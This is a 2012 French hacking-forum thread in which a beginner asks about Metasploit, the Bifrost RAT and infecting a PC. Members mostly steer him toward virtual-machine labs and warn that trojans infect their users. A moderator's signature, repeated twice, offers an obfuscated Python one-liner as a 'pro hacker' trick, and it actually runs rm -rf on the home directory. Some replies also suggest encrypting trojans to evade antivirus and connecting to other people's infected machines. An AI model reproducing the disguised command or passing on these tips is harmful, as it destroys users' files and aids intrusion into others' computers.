Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 26-09-2012 19:59:10

arcare
Membre Actif

besoin aide, difficulté pour progresser dans prise de controle PC

Bonjour tout le monde.

Tout d'abord je vais vous expliquer "qui je suis", ce que je recherche, ce que je maîtrise, puis je vous poserai mes questions (même si ca fait un peu de lecture au moins c'est clair, et c'est surtout parce que je déteste le genre "j'ai pas compris ça comment on fait" donc par principe je vais prendre la peine de détailler certains points)

Si je viens solliciter votre aide aujourd'hui, ce n'est pas pour vous demander un "comment on fait" mais plus pour m'éclairer car la je suis dans le flou.

Mes motivations:

-Tout ce qui concerne les site internet ne m’intéresse pas, (détourner des données etc) je n'y vois pas d’intérêts pour ma part.

-Ce qui m’intéresse et ma toujours fasciner c'est la prise de Control (j'ai lue des articles sur des personnes qui faisait des "compétitions" pour tester des antivirus), depuis je suis mordu, je trouve ça vraiment concret et utile; j'aimerai en faire de même.

Mes questions

Voila maintenant plusieurs mois ou, chaque jour, je lie des tutos, des forums, je m’intéresse à tout ce qui concerne le hacking.
J'étais sous ubuntu quand j'ai commencé à my mettre, depuis je suis sous BT5r2
J'ai cassé la clef wep de ma box, je ne m’intéresse pas vraiment au WPA je trouve ca trop "incertain" (j'en vois déjà qui vont bondir de leurs chaises ^^ )

Pour être honete, je suis perdu dans la sur-information, voici mes questions

1) quelqu'un pourrait-t-il me faire une liste des possibilités qu'offre Metasploit (car honnêtement quand on connait pas on sait pas par ou commencer, et du coup on pédale)

2) Bifrost est-il exécutable sous backtrack (ou linux en géneral) ou est-on obligé d'etre sous windows pour l'utiliser (je déteste windows)

3)est-il possible d'injecter un trojan directement depuis une Box ou sur un réseau pour qu'il contamine un PC ciblé? (dans le cas présent, le vieu PC du bureau avec une batterie d'antivirus différents dessus) 

4) avec bifrost, lorce que le PC ciblé est contaminé, obtient t-on un shell ou un contrôle graphique ?

PS: n'hésitez pas a me poster des topic, j'ai cherché mais je suis surement passé a coté de plein de chose
PS2: Je ne cherche pas d'explications mais des pistes, je veux comprendre et pas exécuter bêtement un tuto en recopiant des commandes
Ps3: Si vous avez d'autre pistes que celles que j'ai cité (qui sont réduite) n'hésitez pas, je rappel que je suis assez novice je veux progresser par étape.

Voila, merci a tous pour la lecture (un peu longue j'imagine) je suivrais ce topic quotidiennement alors n'hésitez pas, quelque soit la critique je la prend et je répondrais.

Merci d'avance pour votre aide !

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 26-09-2012 20:39:47

goliate
Membre Irremplaçable
Site Web

Re : besoin aide, difficulté pour progresser dans prise de controle PC

Salut a toi je vais te donner mon point de vu:

-Bifrost est un trojan qui sert surtout a infecter la personne qui l'utilise, (comme la plupart des trojans que tu trouvera sur la toile).
-Le mieux si tu veut jouer avec les trojans il va valoir ty coller, a le coder toi même.

-Tu as aussi la section tuto du forum, qui est bourrer comme son nom l'indique de bon tuto ( de la lecture en perspective) je te laisse quelque exemples:
-Lien 1
-Lien 2
-Lien 3
-Lien 4

-Sinon en ce qui concerne métasploit, si tu ne connaît pas trop ces possibilité, tu peut regarder ces différent tuto:
-Lien 1
-Lien 2
-Lien 3
-Lien 4

Tu as aussi un GUI pour métasploit, armitage, qui est trés instructif, et je doit dire qu'il et très bien fait. Si tu veut de la doc dis moi le, tu peut lire cependant la doc d'armitage.

Te voila avec de la lecture en stock, si tu as des questions/remarques n’hésite pas.

Dernière modification par goliate (26-09-2012 20:43:05)

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#3 26-09-2012 20:45:05

arcare
Membre Actif

Salut goliate, tout d'abord merci pour ta réponse très pertinente et très rapide.

C'est vrai que je ne l'avais pas exprimé, mais j'avais un doute quand à bifrost, un trojan que n'importe qui utilise sous windows avouons que c'est suspect. tu as plus de précision là dessus ? est-on vraiment victime à 100% ou peut-on en profiter quand même ?

Tu as raison ca fait de la lecture, je m'y attaque de suite et je vous tiens au jus de mon avancement wink Merci

#4 26-09-2012 20:54:14

spawn
Modérateur

1) Pas moi.
2) False
3) Relativement
4) erreur.

Utilise le super combo nmap-nessus-metasploit plutôt que bifrost.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#5 26-09-2012 20:55:04

goliate
Membre Irremplaçable
Site Web

arcare a écrit :

Salut goliate, tout d'abord merci pour ta réponse très pertinente et très rapide.

C'est vrai que je ne l'avais pas exprimé, mais j'avais un doute quand à bifrost, un trojan que n'importe qui utilise sous windows avouons que c'est suspect. tu as plus de précision là dessus ? est-on vraiment victime à 100% ou peut-on en profiter quand même ?

Tu as raison ca fait de la lecture, je m'y attaque de suite et je vous tiens au jus de mon avancement wink Merci

A 100% oui et non, car il faut ouvrir les yeux et ne pas se voiler la face.

Si le mec te pond un trojan pour infecter les gens, qui croit tu qui va infecter en premier??

Il faut savoir que tu es la 1er victime du trojan, car le mec quand il te vend son trojan, il va te dire il faut désactiver ton AV blablabla....Donc si tu désactive ton AV, qui te protège?

Et la personne qui a pondut un trojan, peut vendre le réseau de pc Zombie a des organisation pour des attaques de types DDOS en outre.

@spawn pas tout comprit ^^.

Dernière modification par goliate (26-09-2012 20:55:42)

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#6 26-09-2012 20:56:15

arcare
Membre Actif

Spawn on peut dire que ta réponse est simple mais claire smile

Pour la partie 3 aurais tu une piste à me donner ?

Pour la 4) qu'entend tu par erreur ?

#7 26-09-2012 21:24:48

arcare
Membre Actif

Ca je m'en doutais ^^ ca faisait un peu trop kiddies à mon gout mais bon  avec des vidéo et tout on y croit.

Merci pour ta réponse, j'ai commencé à lire (en diagonal) tout ce que tu m'as envoyé, ya vraiment des trucs super, je pense que ça va bien me faire avancer, mais le niveau est corsé pour moi je dois l'avouer.
Je vais me consacrer à metasploit, faut bien s'y mettre à font un jour, par contre petite question qui arrive:
-pour m’entraîner je voudrais commencer sur un windows virtuelle avant de m'attaquer à celui de mon bureau. Surtout que je ne vie pas dans ma maison la semaine car je suis étudiant donc j'ai plus les CD d’installation. On peut se procurer sur le net une vertion de windows pour virtualiser ?
(http://www.downflex.com/telecharger-mic … ce-pack-2/) <= ca fonctionne ? (j'ai pas testé

#8 26-09-2012 21:37:03

goliate
Membre Irremplaçable
Site Web

La tu me montre juste le SP2 de windows Xp, c'est juste une MAJ de windows xp.

arcare a écrit :

pour m’entraîner je voudrais commencer sur un windows virtuelle avant de m'attaquer à celui de mon bureau

Je te le conseille de rester en Vm, et de ne pas t'attaquer a celui de ton bureau.

Car si tu créer une porte dérobé sur ton win de bureau, imagine que quelqu'un scan une plage d'ip, et tombe sur ton pc de bureau avec la porte dérobé/shell que tu as créer en t’entraînant, tu te retrouve avec un pc vérolée.

Sinon pour t’entraîner a métasploit je te conseille metasploitable, c'est un ubuntu en version 8.04, mais spécialement conçut pour s’entraîner a métasploit.

C'est le même principe que pour faire du penteste envers windows, sauf qu'il faut choisir les payloads pour linux.

J’espère que mes explications sont assez clair?

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#9 26-09-2012 21:44:05

arcare
Membre Actif

génial !

Merci de ton aide, c'est vraiment cool de pouvoir compter sur des gens qui sont prêt à donner de leurs temps pour aider.

Un grand merci, je vais m'y mettre à font pi je posterai un topic quand je serai perdu dans mon avancé :p

J'attend quelques jours avant de mettre le topic en résolue histoire de voir si il n'y a pas d'autre personnes qui ont une contribution à apporter.

Tes infos sont super merci !

#10 27-09-2012 00:17:53

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Le Framework Metasploit ne peut pas être appréhendé uniquement avec de la théorie: c'est comme si tu fais de la biologie sans laboratoire ou bien tu apprends à piloter un Airbus avec un simulateur devant ton ordi et puis un jour tu seras confronté à la réalité en voulant faire atterrir un A380 parce que il n y a des pilotes dans le cockpit. Les systèmes informatiques se pénétraient bien avant l'invention de Metasploit aussi bien par des professionnels de la sécurité informatique soucieux de découvrir et corriger des failles que par des assaillants désirant voler ou détruire ces systèmes et leurs contenus. Cela prouve que Metasploit est un agglomérat des moyens hétéroclites de presque tout ce qu'on sait faire pour attaquer un système, c'est d'ailleurs comme ça qu'il a vu le jour par un jeu en réseau dont les défis étaient de compromettre des systèmes. Le tuto n'est que préliminaire, mieux commencer avec son infiniment petit et remonter pour mieux comprendre sinon tu vas directement vers le couple séduisant du hacking "copier-->coller" et ton domaine de compétence sera ainsi très réduit, le diable se cache toujours dans les détails wink

C'est un domaine très vaste et cela dépend de ce que tu veux faire et de la cible. Tu peux jetter un oeil ou deux sur cette introduction pour commencer --> Je voudrais apprendre à bien hacker

arcare a écrit :

Bifrost est-il exécutable sous backtrack (ou linux en géneral) ou est-on obligé d'etre sous windows pour l'utiliser (je déteste windows)

Jamais entendu parler d'une version Linux, cela ne veux pas dire pour autant qu'il n'existe pas de Trojans Linux. Si tu as son code source tu peux essayer de le compiler sous Linux mais s'il fait appel à une API Windows ça ne sera pas possible, il va falloir bricoler son code pour Linux. Notes qu'avec Metasploit installer dans BackTrack il est possible d'injecter un serveur Bifrost sur la cible, mais celui-ci a un casier judiciaire long comme le bras chez les AVs, et donc pour la crypto c'est une autre histoire.

arcare a écrit :

3)est-il possible d'injecter un trojan directement depuis une Box ou sur un réseau pour qu'il contamine un PC ciblé? (dans le cas présent, le vieu PC du bureau avec une batterie d'antivirus différents dessus)

Il faut un environnement approprié pour que le virus se maintien et se développe, comme dans la nature: le VIH s'attaque aux globules blancs (plus particulièrement le Lymphocyte T) qu'il attaque en premier et s'y installe produisant ensuite des milliers de clones, sans cette cellule il n'y aurait pas de maladie, donc il lui faut un Hôte. Dans un réseau local (LAN) c'est l'ordinateur qui sert de hôte et de porte d'entrée (qu'il soit serveur ou client) et non pas la box. Le plus souvent c'est le navigateur par qui tout arrive, à partir de là le Trojan ou virus peut s'attaquer à la box pour ouvrir des ports depuis l’extérieur, modifier le DNS, MITM, etc.. dans le cas de Bifrost, il ne peut pas s'installer au sein d'une box car celle-ci a un noyau Linux.

arcare a écrit :

4) avec bifrost, lorce que le PC ciblé est contaminé, obtient t-on un shell ou un contrôle graphique ?

C'est plutôt ou presque une interface graphique avec laquelle tu peux appliquer un Keylogger, capture d’écran, download/upload de fichier, etc.

Goliate a écrit :

Et la personne qui a pondut un trojan, peut vendre le réseau de pc Zombie a des organisation pour des attaques de types DDOS en outre.

+1. Absolument, d'ailleurs on se demande comment font tous ceux qui détiennent des milliers d'ordis prêtent à envoyer leurs missiles sur une cible, tu peux en trouver des petits hackers qui ont leur propre réseaux de Botnet, cela prouve qu'il n'y a pas que des exploits dans tout ça, mais effectivement des ordres d'achats et d'acquisitions comme à la bourse. En plus je ne vois pas de site officiel pour télécharger Bifrost, donc un Trojan backdooré à son tour c'est très simple comme un agent double.

Goliate a écrit :

@spawn pas tout comprit

Il ne faut pas le déranger en plein combat avec un Python big_smile

Dernière modification par Fuji (27-09-2012 02:06:52)

#11 27-09-2012 09:06:41

goliate
Membre Irremplaçable
Site Web

Si finalement en relisant j'ai comprit ce que spawn voulais dire.

Je suis tout a fait d'accord avec:

Fuji a écrit :

Le Framework Metasploit ne peut pas être appréhendé uniquement avec de la théorie: c'est comme si tu fais de la biologie sans laboratoire ou bien tu apprends à piloter un Airbus avec un simulateur devant ton ordi et puis un jour tu seras confronté à la réalité en voulant faire atterrir un A380 parce que il n y a des pilotes dans le cockpit. Les systèmes informatiques se pénétraient bien avant l'invention de Metasploit aussi bien par des professionnels de la sécurité informatique soucieux de découvrir et corriger des failles que par des assaillants désirant voler ou détruire ces systèmes et leurs contenus. Cela prouve que Metasploit est un agglomérat des moyens hétéroclites de presque tout ce qu'on sait faire pour attaquer un système, c'est d'ailleurs comme ça qu'il a vu le jour par un jeu en réseau dont les défis étaient de compromettre des systèmes. Le tuto n'est que préliminaire, mieux commencer avec son infiniment petit et remonter pour mieux comprendre sinon tu vas directement vers le couple séduisant du hacking "copier-->coller" et ton domaine de compétence sera ainsi très réduit, le diable se cache toujours dans les détails

Perso ce que je fais pour m’entraîner (c'est pour sa que je te parler de VM), ce que je fait, je me monte une Vm (win xp sp3 généralement, mais pas toujours), et je n'installe pas d'AV, j'installe java et firefox, (car metasploit a de bon modules pour pown FF).
Ensuite une foit que j'ai prit le contrôle ( de différente façon), j'installe un AV et je vois se que je peut faire, tout sa dans mon propre réseau.

Une foit ma Vm de mon réseau Pown, je lui créer son réseau pour qu'il n’apparaisse pas sur mon LAN (virtuellement je parle), et de là, je recommence sans AV, puis avec.

De toutes façon il n'as quand s’exerçant, que tu pourras comprendre le fonctionnement.Tu peut aussi lire le fonctionnement du réseau, des différente couches dont il et composé etc....(si je te trouve de la bonne doc dessus, je te métrer les liens).

Dernière modification par goliate (27-09-2012 09:08:10)

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#12 27-09-2012 17:46:34

arcare
Membre Actif

Salut fuji !

Merci pour ton explication, très précise, très bien imagée, je vais me consacrer à metasploit maintenant et laisser les autres bidouillage de coté. Pour le PC du bureau, c'est pas pour tout de suite ^^ j'ai encore plein de choses a apprendre avant.

Mais une question me (re)vient; enfin c'est plutôt une demande de renseignement en plus ^^:
-Toujours par rapport a bifrost, en effet c'est un trojan, et nous en sommes les victimes, mais ne pouvons nous pasen tirer profil ? (au moins apprendre deux trois trucs?)
-Mais (attention à la phrase qui va suivre, je ne suis pas sur de sa francaisité) est-il possible de tirer de bifrost plus (+) que ce que lui même tire de nous (notre machine) ? Ou alors, éviter les effets indésirables.

En gros: meme si c'est on devient contaminé, n'est-til pas posible de faire 2-3 choses interessante quand même ?
Ca vaut la peine d’essayer ?
Je me borne un peu avec ce trojan, car il a l'air d'avoir des ressources très intéressantes. Ne peut-t-on pas "garder le meilleur" ?
PS: Ya til d'autres téchniques pour faire la meme chose que bifrost ?

#13 28-09-2012 04:12:43

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Il n'y a pas que Bifrost comme RAT pour être une victime, d'autres Trojans comme Prorat, NetBus, SpyNet, DarkComet, SubSeven, Lost Door Rat...etc, et la liste est longue avec aussi Poison Ivy depuis semble-t-il son site officiel. Comment veux-tu en tirer profit de Bifrost ou autre ? tu peux essayer d'analyser son code, le crypter pour échapper à la vigilance d'un antivirus afin de le réutiliser ou bien essayer d'analyser les connexions sortantes d'une machine infectée pour en connaitre l'IP du pirate avec (Netstat/Nmap). Mais une particularité intéressante c'est d'utiliser le célèbre scanner SuperScan 3 dont la fonction est de scanner une adresse IP afin de se connecter via FTP, Telnet, et Http mais aussi il propose via une liste de signatures si la machine est infectée car en principe chaque Trojans ouvre un port qui lui est spécifique par défaut, il serait possible ensuite muni du client de se connecter à la place du pirate, s'il n'y a pas un code d'identification.

Nous ici on a un goût particulier pour Meterpreter dont Goliate t'a indiqué un lien, il marche au doigt et à l'oeil et propose des fonctionnalités très pointues et beaucoup plus développées que lesdits Trojans, en plus il est destiné pour le pentest wink

Dernière modification par Fuji (28-09-2012 04:24:58)

#14 28-09-2012 07:42:26

goliate
Membre Irremplaçable
Site Web

Puisque tu veut continuer dans les rat et compagnie, je vais en citer un que notre ami Fuji n'as pas donné, "Snacknet", MAIS ATTENTION, si tu te décide a utiliser celui si, sache que tu sera infecter, et que même après un passage de ton meilleur AV +malwarebyte, tu auras toujours l'infection par ce dernier.

Certain dirons même qu’après un formatage la bête et toujours présentes.

Pour ce qui et de ta question, ce que j'ai comprit (arrête moi si je me trompe), tu veut savoir si le jeux en faut la chandelle?C'est bien sa?

Si c'est sa ta question, je dirais que non , car tu as d'autre méthode pour pentester un pc sans que tu ne soit infecter.

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#15 28-09-2012 08:50:46

spawn
Modérateur

arcare : cf plus haut (:

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#16 28-09-2012 21:34:47

arcare
Membre Actif

Bonjour, bonjour.

Merci pour tes précisions fuji, je viens de lire ton post rapidos j'ai pas tout compris mais je vais my pencher demain.

Goliate tu as tout compris c'est bien ca que je me demandé.

J'ai un peu compris le système des trojan, ca ne m'attire pas plus que ca, si c'est pour etre infester dans tous les sens, ca n'en vaut pas la peine. en fait nous sommes plus victime qu'autre chose ?

des lundi je m'attaque a metasploit, j'ai retrouvé mes version de windows xp je vais les virtualiser sur ma machine avant de repartir pour la semaine. Je vous tiendrais au courant de l'avancé de tout ca.

Une idées m'est venue, pouvez vous me dire ce que vous en pensez?
Je pensais (d'ici quelques temps) réaliser un genre de tuto, pour les débutants (les vrais de vrais xD) qui veulent savoir par ou commencer dans l'intrusion. Bien sur je n'ai pas encore les connaissances nécéssaires mais je vais travailler dur, et je sais que je peux compter sur vous si j'ai besoin d'un bon site :p

Voila, il ne me reste plus qu'a travailler, je fais un résumé a la fin de la semaine prochain, merci beauocup de votre aide vous m'avez fait avancé mais ce n'est que le début.

#17 28-09-2012 21:38:14

arcare
Membre Actif

Vous allez me dire qu'il en existe beaucoup et que ca ne sera que de la redite, mais je voudrais faire un truc light avec les grandes lignes et les pistes a suivre (lien vers d'autre tutos ou sites) et surtout expliqué d'une facon SIMPLE. (parce que apprendre un truc avec un tuto ou on comprend 1 mot sur 2 c'est chaud chaud) enfin voila, dans tous les cas c'est pas pour tout de suite ^^

#18 28-09-2012 22:21:47

goliate
Membre Irremplaçable
Site Web

C'est une bonne idée, car beaucoup de tuto sur métasploit son sur un outils précis, ou en anglais.

Après tu sait le faite d'utiliser métasploit seule risque de te coûter du temps dans tes recherches d’audits (hormis sur t'es Vm, que tu prendra soit de rendre vulnérable), Car lorsque tu auras un Pc a auditer la meilleur façon de savoir si il peut avoir des failles et de le scanner avec nessus.
En plus la version 5 de nessus, contient des option pour d'aider a faire des teste de pénétration avec les outils que te propose métasploit.

Il faut savoir que nessus et aussi intégrer a métasploit, je te laisse ce tuto, qui te donneras plus d'infos a ce sujet.

Voila bonne continuation et tient nous au courant.

Ps: évite les double poste, il sont mal vu ici.

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#19 29-09-2012 11:25:17

arcare
Membre Actif

Merci pour ce tuto, il à l'air interessant. En effet ca risque de me prendre beaucoup de temps, et surtout beaucoup d'organisation.

Et vous vous avez mis combien de temps pour commencer a comprendre le fonctionnement et à le mettre en pratique ?

désolé pour le double poste, je m'étais rendu compte que le 1er n'était pas assez précis. J'y ferai attention la prochaine foi

#20 29-09-2012 12:31:07

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne

l'important n'est pas de comparé le temps que tu mettra avec d'autres plus ou moins rapide que toi, mais d'assimiler tranquillement ce que tu fait, et surtout comprendre ce que tu as à gagner pour ta propre sécurité...

« γνωθι σεαυτον »

#21 29-09-2012 13:59:00

goliate
Membre Irremplaçable
Site Web

Je croit que Jean-Charles a tout dis, car cela dépend des individus.

Certain font assimiler python assez vite alors que d'autre font devoir lire et relire et vice versa (sa n'est qu'un exemple).
Par contre dans le domaine de l'informatique, sache que l'on en apprend tout les jours, pour la simple et bonne raison que les choses evolue et heuresement j'ai envie de dire.

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#22 02-10-2012 17:48:49

arcare
Membre Actif

Bonjour a tous !

Je viens de tomber sur ca :

http://www.matael.info/documents/secu/S … acking.pdf

Un petit livre assez simpat qui reprend tout avec pas mal de précision

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.035 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]